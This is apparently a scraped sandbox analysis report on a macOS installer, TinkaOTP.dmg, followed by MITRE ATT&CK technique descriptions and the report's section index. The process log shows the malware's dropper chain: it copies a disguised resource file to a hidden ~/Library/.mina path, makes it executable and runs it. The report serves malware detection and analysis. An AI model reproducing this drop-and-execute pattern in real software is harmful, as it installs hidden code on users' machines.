Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	44048 bytes
MD5 hash:	4782e7ebd2985d32bc84f1f71c8f8fb7

Chronological Activities

Analysis Process: TinkaOTP PID: 18263 Parent PID: 1

General

Start time:	15:16:23
Start date:	06/05/2020
Path:	/Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP
Arguments:	/Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP
File size:	716832 bytes
MD5 hash:	02670c82d74d0362a5fafdf3f42904ef

Chronological Activities

Analysis Process: bash PID: 18264 Parent PID: 18263

General

Start time:	15:16:24
Start date:	06/05/2020
Path:	/bin/bash
Arguments:	n/a
File size:	618416 bytes
MD5 hash:	0313fd399b143fc40cd52a1679018305

Chronological Activities

Analysis Process: bash PID: 18265 Parent PID: 18264

General

Start time:	15:16:24
Start date:	06/05/2020
Path:	/bin/bash
Arguments:	n/a
File size:	618416 bytes
MD5 hash:	0313fd399b143fc40cd52a1679018305

Chronological Activities

Analysis Process: cp PID: 18265 Parent PID: 18264

General

Start time:	15:16:24
Start date:	06/05/2020
Path:	/bin/cp
Arguments:	cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib /Users/ben/Library/.mina
File size:	29024 bytes
MD5 hash:	b78b44666e242cb82db43e70116add92

Chronological Activities

Analysis Process: bash PID: 18266 Parent PID: 18264

General

Start time:	15:16:24
Start date:	06/05/2020
Path:	/bin/bash
Arguments:	n/a
File size:	618416 bytes
MD5 hash:	0313fd399b143fc40cd52a1679018305

Chronological Activities

Analysis Process: chmod PID: 18266 Parent PID: 18264

General

Start time:	15:16:24
Start date:	06/05/2020
Path:	/bin/chmod
Arguments:	chmod +x /Users/ben/Library/.mina
File size:	30016 bytes
MD5 hash:	d7df83ea3a49de5d07e0c1730e910852

Chronological Activities

Analysis Process: bash PID: 18267 Parent PID: 18264

General

Start time:	15:16:24
Start date:	06/05/2020
Path:	/bin/bash
Arguments:	n/a
File size:	618416 bytes
MD5 hash:	0313fd399b143fc40cd52a1679018305

Chronological Activities

Analysis Process: .mina PID: 18267 Parent PID: 18264

General

Start time:	15:16:24
Start date:	06/05/2020
Path:	/Users/ben/Library/.mina
Arguments:	/Users/ben/Library/.mina
File size:	673092 bytes
MD5 hash:	f05437d510287448325bac98a1378de1

Chronological Activities

Analysis Process: .mina PID: 18268 Parent PID: 18267

General

Start time:	15:16:24
Start date:	06/05/2020
Path:	/Users/ben/Library/.mina
Arguments:	n/a
File size:	673092 bytes
MD5 hash:	f05437d510287448325bac98a1378de1

Description:	Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion, Persistence
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in `/System/Library/LaunchDaemons` and `/Library/LaunchDaemons` . These LaunchDaemons have property list files which point to the executables that will be launched . Adversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories . The daemon name may be disguised by using a name from a related operating system or benign software . Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root. The plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon’s executable and gain persistence or Privilege Escalation.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long adjustments are made to the rest of the fields and dependencies . There are tools available to perform these changes. Any changes will invalidate digital signatures on binaries because the binary is being modified. Adversaries can remediate this issue by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time .
Tactics:	Persistence
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as `/Library/Preferences` (which execute with elevated privileges) and `~/Library/Preferences` (which execute with a user's privileges). Adversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report TinkaOTP.dmg

Overview

General Information

Detection

Classification Spiderchart

Mitre Att&ck Matrix

Signature Overview

Networking:

System Summary:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Malware Configuration

Signature Similarity

Similar Samples

Runtime Messages

Behavior Graph

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Sigma Overview

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

Contacted IPs

Public

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

HTTPS Packets

System Behavior

Analysis Process: xpcproxy PID: 18263 Parent PID: 1

General

Analysis Process: TinkaOTP PID: 18263 Parent PID: 1

General

Analysis Process: bash PID: 18264 Parent PID: 18263

General

Analysis Process: bash PID: 18265 Parent PID: 18264

General

Analysis Process: cp PID: 18265 Parent PID: 18264

General

Analysis Process: bash PID: 18266 Parent PID: 18264

General

Analysis Process: chmod PID: 18266 Parent PID: 18264

General

Analysis Process: bash PID: 18267 Parent PID: 18264

General

Analysis Process: .mina PID: 18267 Parent PID: 18264

General

Analysis Process: .mina PID: 18268 Parent PID: 18267

General